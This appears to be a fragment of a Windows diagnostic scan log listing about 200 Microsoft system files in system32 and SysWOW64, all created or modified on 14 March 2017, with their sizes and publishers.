2017-03-14 15:44 - 2017-03-04 03:07 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-03-14 15:44 - 2017-03-04 03:06 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-03-14 15:44 - 2017-03-04 03:06 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-03-14 15:44 - 2017-03-04 03:06 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2017-03-14 15:44 - 2017-03-04 03:06 - 01131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-03-14 15:44 - 2017-03-04 03:06 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2017-03-14 15:44 - 2017-03-04 03:06 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2017-03-14 15:44 - 2017-03-04 03:04 - 01826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-03-14 15:44 - 2017-03-04 03:04 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-03-14 15:44 - 2017-03-04 03:04 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-03-14 15:44 - 2017-03-04 03:04 - 00433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2017-03-14 15:44 - 2017-03-04 03:04 - 00340992 _____ (Microsoft Corporation) C:\WINDOWS\system32\RADCUI.dll
2017-03-14 15:44 - 2017-03-04 03:01 - 01493504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wpc.dll
2017-03-14 15:44 - 2017-02-21 23:17 - 00448285 _____ C:\WINDOWS\system32\ApnDatabase.xml
2017-03-14 15:43 - 2017-03-04 04:57 - 00192352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-03-14 15:43 - 2017-03-04 04:35 - 01617760 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-03-14 15:43 - 2017-03-04 04:35 - 01294688 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-03-14 15:43 - 2017-03-04 04:35 - 00565088 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-03-14 15:43 - 2017-03-04 04:35 - 00242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-03-14 15:43 - 2017-03-04 04:35 - 00086368 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-03-14 15:43 - 2017-03-04 04:27 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-03-14 15:43 - 2017-03-04 04:24 - 00646688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2017-03-14 15:43 - 2017-03-04 04:22 - 07786336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-03-14 15:43 - 2017-03-04 04:21 - 02255712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-03-14 15:43 - 2017-03-04 04:19 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 15:43 - 2017-03-04 04:18 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\IPHLPAPI.DLL
2017-03-14 15:43 - 2017-03-04 04:15 - 00063328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-03-14 15:43 - 2017-03-04 04:11 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-03-14 15:43 - 2017-03-04 04:10 - 02828384 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2017-03-14 15:43 - 2017-03-04 04:10 - 02189664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-03-14 15:43 - 2017-03-04 04:09 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-03-14 15:43 - 2017-03-04 04:09 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-03-14 15:43 - 2017-03-04 04:09 - 00681312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2017-03-14 15:43 - 2017-03-04 04:09 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-03-14 15:43 - 2017-03-04 04:09 - 00635864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-03-14 15:43 - 2017-03-04 04:09 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-03-14 15:43 - 2017-03-04 04:08 - 00450400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2017-03-14 15:43 - 2017-03-04 04:08 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-03-14 15:43 - 2017-03-04 04:07 - 02446704 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2017-03-14 15:43 - 2017-03-04 04:07 - 00432992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2017-03-14 15:43 - 2017-03-04 04:03 - 04674360 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-03-14 15:43 - 2017-03-04 04:03 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-03-14 15:43 - 2017-03-04 04:03 - 00755648 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2017-03-14 15:43 - 2017-03-04 04:03 - 00523712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll
2017-03-14 15:43 - 2017-03-04 04:03 - 00424616 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFPlay.dll
2017-03-14 15:43 - 2017-03-04 04:03 - 00241496 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-03-14 15:43 - 2017-03-04 04:03 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-03-14 15:43 - 2017-03-04 03:58 - 01416224 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-03-14 15:43 - 2017-03-04 03:42 - 07216640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-03-14 15:43 - 2017-03-04 03:37 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-03-14 15:43 - 2017-03-04 03:36 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-03-14 15:43 - 2017-03-04 03:35 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ddrawex.dll
2017-03-14 15:43 - 2017-03-04 03:33 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2017-03-14 15:43 - 2017-03-04 03:33 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2017-03-14 15:43 - 2017-03-04 03:31 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll
2017-03-14 15:43 - 2017-03-04 03:31 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2017-03-14 15:43 - 2017-03-04 03:31 - 00247808 _____ (Microsoft Corporation) C:\WINDOWS\system32\icm32.dll
2017-03-14 15:43 - 2017-03-04 03:30 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-03-14 15:43 - 2017-03-04 03:30 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2017-03-14 15:43 - 2017-03-04 03:30 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.OneCore.dll
2017-03-14 15:43 - 2017-03-04 03:30 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2017-03-14 15:43 - 2017-03-04 03:30 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2017-03-14 15:43 - 2017-03-04 03:30 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2017-03-14 15:43 - 2017-03-04 03:29 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2017-03-14 15:43 - 2017-03-04 03:29 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2017-03-14 15:43 - 2017-03-04 03:29 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2017-03-14 15:43 - 2017-03-04 03:29 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2017-03-14 15:43 - 2017-03-04 03:29 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BrowserSettingSync.dll
2017-03-14 15:43 - 2017-03-04 03:28 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2017-03-14 15:43 - 2017-03-04 03:28 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\vpnike.dll
2017-03-14 15:43 - 2017-03-04 03:28 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2017-03-14 15:43 - 2017-03-04 03:28 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ks.sys
2017-03-14 15:43 - 2017-03-04 03:28 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2017-03-14 15:43 - 2017-03-04 03:28 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2017-03-14 15:43 - 2017-03-04 03:27 - 00460288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2017-03-14 15:43 - 2017-03-04 03:27 - 00432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-03-14 15:43 - 2017-03-04 03:27 - 00311296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2017-03-14 15:43 - 2017-03-04 03:27 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-03-14 15:43 - 2017-03-04 03:26 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2017-03-14 15:43 - 2017-03-04 03:26 - 00658432 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-03-14 15:43 - 2017-03-04 03:26 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\ddraw.dll
2017-03-14 15:43 - 2017-03-04 03:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2017-03-14 15:43 - 2017-03-04 03:26 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2017-03-14 15:43 - 2017-03-04 03:26 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2017-03-14 15:43 - 2017-03-04 03:26 - 00264704 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2017-03-14 15:43 - 2017-03-04 03:26 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2017-03-14 15:43 - 2017-03-04 03:25 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2017-03-14 15:43 - 2017-03-04 03:25 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2017-03-14 15:43 - 2017-03-04 03:25 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-03-14 15:43 - 2017-03-04 03:24 - 01025536 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll
2017-03-14 15:43 - 2017-03-04 03:24 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\iphlpsvc.dll
2017-03-14 15:43 - 2017-03-04 03:23 - 00634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll
2017-03-14 15:43 - 2017-03-04 03:23 - 00541696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2017-03-14 15:43 - 2017-03-04 03:23 - 00320512 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2017-03-14 15:43 - 2017-03-04 03:22 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-03-14 15:43 - 2017-03-04 03:21 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-03-14 15:43 - 2017-03-04 03:21 - 00591360 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-03-14 15:43 - 2017-03-04 03:20 - 01280512 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2017-03-14 15:43 - 2017-03-04 03:20 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-03-14 15:43 - 2017-03-04 03:20 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-03-14 15:43 - 2017-03-04 03:19 - 01639424 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-03-14 15:43 - 2017-03-04 03:19 - 01589760 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2017-03-14 15:43 - 2017-03-04 03:19 - 01584128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2017-03-14 15:43 - 2017-03-04 03:19 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2017-03-14 15:43 - 2017-03-04 03:19 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Tabbtn.dll
2017-03-14 15:43 - 2017-03-04 03:18 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2017-03-14 15:43 - 2017-03-04 03:17 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2017-03-14 15:43 - 2017-03-04 03:17 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-03-14 15:43 - 2017-03-04 03:17 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-03-14 15:43 - 2017-03-04 03:17 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2017-03-14 15:43 - 2017-03-04 03:16 - 03289088 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2017-03-14 15:43 - 2017-03-04 03:16 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2017-03-14 15:43 - 2017-03-04 03:15 - 18362368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-03-14 15:43 - 2017-03-04 03:15 - 09130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-03-14 15:43 - 2017-03-04 03:15 - 02860032 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2017-03-14 15:43 - 2017-03-04 03:15 - 01837056 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2017-03-14 15:43 - 2017-03-04 03:14 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-03-14 15:43 - 2017-03-04 03:14 - 00588288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidprov.dll
2017-03-14 15:43 - 2017-03-04 03:14 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-03-14 15:43 - 2017-03-04 03:13 - 19411968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-03-14 15:43 - 2017-03-04 03:13 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2017-03-14 15:43 - 2017-03-04 03:13 - 00937472 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2017-03-14 15:43 - 2017-03-04 03:13 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2017-03-14 15:43 - 2017-03-04 03:13 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFoldersShell.dll
2017-03-14 15:43 - 2017-03-04 03:13 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\CameraCaptureUI.dll
2017-03-14 15:43 - 2017-03-04 03:13 - 00112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFoldersGPExt.dll
2017-03-14 15:43 - 2017-03-04 03:12 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2017-03-14 15:43 - 2017-03-04 03:12 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2017-03-14 15:43 - 2017-03-04 03:11 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-03-14 15:43 - 2017-03-04 03:11 - 02278400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-03-14 15:43 - 2017-03-04 03:11 - 00975872 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-03-14 15:43 - 2017-03-04 03:11 - 00821248 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-03-14 15:43 - 2017-03-04 03:11 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkfoldersControl.dll
2017-03-14 15:43 - 2017-03-04 03:11 - 00572416 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-03-14 15:43 - 2017-03-04 03:10 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2017-03-14 15:43 - 2017-03-04 03:10 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-03-14 15:43 - 2017-03-04 03:10 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-03-14 15:43 - 2017-03-04 03:10 - 00971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-03-14 15:43 - 2017-03-04 03:10 - 00913920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2017-03-14 15:43 - 2017-03-04 03:10 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-03-14 15:43 - 2017-03-04 03:10 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFolders.exe
2017-03-14 15:43 - 2017-03-04 03:09 - 08125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-03-14 15:43 - 2017-03-04 03:09 - 01633792 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-03-14 15:43 - 2017-03-04 03:08 - 01780224 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-03-14 15:43 - 2017-03-04 03:08 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 02914816 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 02895872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-03-14 15:43 - 2017-03-04 03:07 - 01348608 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2017-03-14 15:43 - 2017-03-04 03:07 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-03-14 15:43 - 2017-03-04 03:06 - 05384192 _____ (Microsoft) C:\WINDOWS\system32\dbgeng.dll
2017-03-14 15:43 - 2017-03-04 03:06 - 04746752 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-03-14 15:43 - 2017-03-04 03:06 - 04708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-03-14 15:43 - 2017-03-04 03:06 - 03614720 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-03-14 15:43 - 2017-03-04 03:06 - 03202048 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-03-14 15:43 - 2017-03-04 03:06 - 02475008 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-03-14 15:43 - 2017-03-04 03:06 - 02287104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-03-14 15:43 - 2017-03-04 03:05 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-03-14 15:43 - 2017-03-04 03:05 - 01328640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2017-03-14 15:43 - 2017-03-04 03:05 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-03-14 15:43 - 2017-03-04 03:05 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2017-03-14 15:43 - 2017-03-04 03:03 - 06044672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-03-14 15:43 - 2017-03-04 03:03 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-03-14 15:43 - 2017-03-04 03:02 - 00510464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-03-14 15:43 - 2017-03-04 03:00 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-03-14 15:42 - 2017-03-04 04:35 - 00655200 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-03-14 15:42 - 2017-03-04 04:35 - 00590952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-03-14 15:42 - 2017-03-04 04:35 - 00378720 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-03-14 15:42 - 2017-03-04 04:35 - 00343904 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-03-14 15:42 - 2017-03-04 04:35 - 00315232 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-03-14 15:42 - 2017-03-04 04:35 - 00142176 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-03-14 15:42 - 2017-03-04 04:35 - 00038240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-03-14 15:42 - 2017-03-04 04:25 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-03-14 15:42 - 2017-03-04 04:24 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-03-14 15:42 - 2017-03-04 04:24 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-03-14 15:42 - 2017-03-04 04:24 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2017-03-14 15:42 - 2017-03-04 04:22 - 01354312 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-03-14 15:42 - 2017-03-04 04:22 - 01172984 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-03-14 15:42 - 2017-03-04 04:20 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2017-03-14 15:42 - 2017-03-04 04:20 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2017-03-14 15:42 - 2017-03-04 04:18 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-03-14 15:42 - 2017-03-04 04:15 - 00404320 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2017-03-14 15:42 - 2017-03-04 04:13 - 00635456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-03-14 15:42 - 2017-03-04 04:11 - 00266544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-03-14 15:42 - 2017-03-04 04:09 - 00578392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-03-14 15:42 - 2017-03-04 04:09 - 00178520 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-03-14 15:42 - 2017-03-04 04:08 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-03-14 15:42 - 2017-03-04 04:08 - 00509280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-03-14 15:42 - 2017-03-04 04:08 - 00342456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2017-03-14 15:42 - 2017-03-04 04:07 - 02913144 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-03-14 15:42 - 2017-03-04 04:07 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2017-03-14 15:42 - 2017-03-04 04:07 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-03-14 15:42 - 2017-03-04 04:07 - 00989016 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-03-14 15:42 - 2017-03-04 04:07 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-03-14 15:42 - 2017-03-04 04:07 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-03-14 15:42 - 2017-03-04 04:07 - 00682808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-03-14 15:42 - 2017-03-04 04:07 - 00116064 _____ (Microsoft Corporation) C:\WINDOWS\system32\icfupgd.dll
2017-03-14 15:42 - 2017-03-04 04:07 - 00110944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvsocket.sys
2017-03-14 15:42 - 2017-03-04 04:07 - 00080224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys
2017-03-14 15:42 - 2017-03-04 04:03 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2017-03-14 15:42 - 2017-03-04 04:03 - 00038768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompPkgSup.dll
2017-03-14 15:42 - 2017-03-04 04:01 - 00201568 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-03-14 15:42 - 2017-03-04 04:01 - 00128648 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpapi.dll
2017-03-14 15:42 - 2017-03-04 03:59 - 01570208 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-03-14 15:42 - 2017-03-04 03:58 - 00628552 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-03-14 15:42 - 2017-03-04 03:58 - 00322912 _____ (Microsoft Corporation) C:\WINDOWS\system32\input.dll
2017-03-14 15:42 - 2017-03-04 03:57 - 00372432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2017-03-14 15:42 - 2017-03-04 03:37 - 00025088 _____ C:\WINDOWS\system32\GamePanelExternalHook.dll
2017-03-14 15:42 - 2017-03-04 03:36 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfp.dll
2017-03-14 15:42 - 2017-03-04 03:36 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2017-03-14 15:42 - 2017-03-04 03:36 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2017-03-14 15:42 - 2017-03-04 03:35 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-03-14 15:42 - 2017-03-04 03:34 - 00124416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.SystemManagement.dll
2017-03-14 15:42 - 2017-03-04 03:34 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfui.dll
2017-03-14 15:42 - 2017-03-04 03:34 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmclr.sys
